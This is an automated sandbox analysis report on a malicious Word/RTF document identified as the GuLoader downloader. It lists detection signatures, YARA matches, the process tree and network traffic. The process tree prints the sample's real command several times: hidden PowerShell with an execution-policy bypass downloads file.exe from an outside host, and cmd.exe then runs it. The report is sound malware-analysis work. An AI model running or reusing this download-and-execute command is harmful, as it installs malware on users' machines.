Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEPO0015922.doc

Overview

General Information

Sample Name:TEPO0015922.doc
Analysis ID:829399
MD5:364dc6c0e8a18b796aa535516d04cb53
SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
Tags:doc
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Yara detected GuLoader
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1404 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 1204 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 264 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1820 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2460 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 2840 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1568 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 1452 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • cmd.exe (PID: 1320 cmdline: "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1832 cmdline: PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1668 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • file.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\file.exe MD5: A1AFEF77EEC567ADB1076E8679AF207B)
    • verclsid.exe (PID: 1808 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 280 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
TEPO0015922.docSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
TEPO0015922.docINDICATOR_RTF_Exploit_Scriptingdetects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.ditekSHen
  • 0xf3f9:$clsid2: 0003000000000000C000000000000046
  • 0xeb57:$ole6: D0Cf11E
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink
  • 0xcad:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
TEPO0015922.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xb9e:$obj2: \objdata
  • 0xeb0c:$obj2: \objdata
  • 0xeaf8:$obj3: \objupdate
  • 0xea73:$obj4: \objemb
  • 0x10077:$obj4: \objemb
  • 0xea62:$obj6: \objlink

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\file.exeSUSP_NullSoftInst_Combo_Oct20_1Detects suspicious NullSoft Installer combination with common Copyright stringsFlorian Roth (Nextron Systems)
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeSUSP_NullSoftInst_Combo_Oct20_1Detects suspicious NullSoft Installer combination with common Copyright stringsFlorian Roth (Nextron Systems)
  • 0x18c08:$a1: NullsoftInst
  • 0x183d0:$b1: Microsoft Corporation
  • 0x1841c:$b1: Microsoft Corporation
  • 0x18500:$b1: Microsoft Corporation
  • 0x18584:$b1: Microsoft Corporation

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
  • 0xa9fc:$s3: System.Net.WebClient).DownloadFile('httP
0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth (Nextron Systems)
  • 0xa9bb:$sb1: -W Hidden
  • 0xa9ab:$sc1: -NoP
  • 0xa9b5:$sd1: -NonI
  • 0xa9c5:$se3: -ExecutionPolicy bypass
  • 0xa9b0:$sf1: -sta
00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
  • 0x91a:$s3: System.Net.WebClient).DownloadFile('httP
00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth (Nextron Systems)
  • 0x329c:$s3: System.Net.WebClient).DownloadFile('httP
00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth (Nextron Systems)
  • 0x26d0:$sb1: -W Hidden
  • 0x2880:$sb1: -W Hidden
  • 0x325b:$sb1: -W Hidden
  • 0x26b0:$sc1: -NoP
  • 0x2860:$sc1: -NoP
  • 0x324b:$sc1: -NoP
  • 0x26c4:$sd1: -NonI
  • 0x2874:$sd1: -NonI
  • 0x3255:$sd1: -NonI
  • 0x26e4:$se3: -ExecutionPolicy bypass
  • 0x2894:$se3: -ExecutionPolicy bypass
  • 0x3265:$se3: -ExecutionPolicy bypass
  • 0x26ba:$sf1: -sta
  • 0x286a:$sf1: -sta
  • 0x3250:$sf1: -sta
Click to see the 16 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: TEPO0015922.docReversingLabs: Detection: 23%
Source: TEPO0015922.docVirustotal: Detection: 42%Perma Link
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: C:\Users\user\AppData\Roaming\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004065CE FindFirstFileA,FindClose,9_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004027AA FindFirstFileA,9_2_004027AA
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,16_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004065CE FindFirstFileA,FindClose,16_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004027AA FindFirstFileA,16_2_004027AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: file[1].exe.0.drJump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scTJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: thekaribacruisecompany.com
Source: global trafficDNS query: name: thekaribacruisecompany.com
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 149.102.154.62:443 -> 192.168.2.22:49171
